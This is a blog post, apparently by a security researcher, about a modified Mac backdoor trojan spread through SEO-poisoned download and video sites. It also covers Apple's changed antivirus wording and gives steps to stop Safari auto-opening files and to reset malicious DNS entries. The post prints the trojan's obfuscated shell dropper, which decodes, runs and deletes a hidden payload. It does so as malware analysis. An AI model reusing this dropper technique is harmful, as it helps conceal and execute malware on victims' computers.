Apple updated its web pages as Snow Leopard is expected to be released this September.
A notable change is in Security section, where Apple admits that “no system can be 100 percent immune from every threat” and acknowledges that “antivirus software may offer additional protection”.
Interestingly, prior to this change is a strong campaign that every “Mac is Secure”. (Thank goodness, I have kept a copy of those pages because I have noted and reference a link in my abstract here.)
If you’ll reckon this page last year (below) – this has caught massive media attention as Apple recommends Antivirus which is contrary to its security campaign. The attention further escalates when Apple removed and said that it was “incurrate” – referring that it is old and not updated. (Google “Apple removes anti-virus” for further story).
Although, I think users should understand here is that “Security is a Process and NOT a Product”. Evidently, gaining popularity delivers both worlds – Good and Bad. Obviously, users with confidential information stored in their hard drives and performs financial transaction online must understand that it is users’ responsibility to protect themselves from outside threats especially with the growing numbers of organized cyber-crimes.
Last week, I have spotted a modified version of MacCinema. It was not significant, the modification was purely to avoid scanners detection.
The script looks like this:
if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 | sed 's/lala/nigeb/' | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | tail -r | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7037/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
agazagiz 666 lala
Anyway, this backdoor trojan is massively distributed around the internet. It uses Google SEO, so most users stumbled to these malicious sites from Google search.
Some lures Mac users promising free downloads of full version softwares, cracks, serials, activators, generators, keys, fixes – just like the screenshot below.
…while other links to Mac videos like this PornTube below.
There are malware serving sites that is bit aggressive, where it does not ask user to download the DMG files instead it automatically downloads and mounts – as it is turned on by default, you can disable automount by following this instruction:
1. Open Safari
2. Open “Preferences” under the “Safari” menu
3. Click on the “General” tab
4. Un-check the “Open ’safe’ files after downloading” box
5. Close Safari’s preferences
This instruction has been previously discussed here.
Option 1 – Locate and click the Apple icon in your upper left corner and click “System Preferences”, then “Network” and search for “DNS Server”. If you want to modify and remove malicious entry, you can simply click the box and input the right address. However, if you are not sure simply try release & renew as instructed below.
Option 2 – Open Terminal (~/Applications/Utilities or you can search it using spotlight)
From the terminal, type “cat /etc/resolv.conf”. This command will return your domain and name servers.
Another command is, “scutil –-dns”. Check resolver #1, this often returns domain and name servers as well.
Release and Renew to remove malicious DNS entry
From the terminal, type the following:
sudo ifconfig en1 down
sudo ifconfig en1 up
**Note: sudo means run as root user, so it will require you to input password. Also, en1 is often interfaced to LAN and en0 to Wireless – just try and see which one will work.
Another way is to unplug your internet connnection and reconnect. This will also work (”,)